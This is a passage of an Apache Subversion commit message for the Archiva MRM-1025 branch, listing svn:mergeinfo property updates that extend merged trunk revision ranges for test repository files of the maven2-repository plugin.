-/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/.index/some-index.zip:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/incomplete-metadata-1.0-20091101.112233-1.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/incomplete-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/invalid-pom/1.0/invalid-pom-1.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/malformed-metadata-1.0-20091101.112233-1.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/malformed-metadata/1.0-SNAPSHOT/maven-metadata.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:825850-883981,889228-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom:825850-883981,889228-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:825850-883981,889228-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0:825850-883981,889228-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:825850-883981,889228-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/mislocated-pom/1.0/mislocated-pom-1.0.pom:825850-883981,889228-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:825850-883981,883982-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT:825850-883981,883982-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/com/example/test/missing-metadata/1.0-SNAPSHOT/missing-metadata-1.0-20091101.112233-1.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:825850-882383,883982-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/plugins:825850-882383,883982-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/repositories/test/org/apache/maven/shared/maven-downloader/maven-metadata.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:825850-882383,885006-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/commons-io:825850-882383,885006-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache:699795-705848 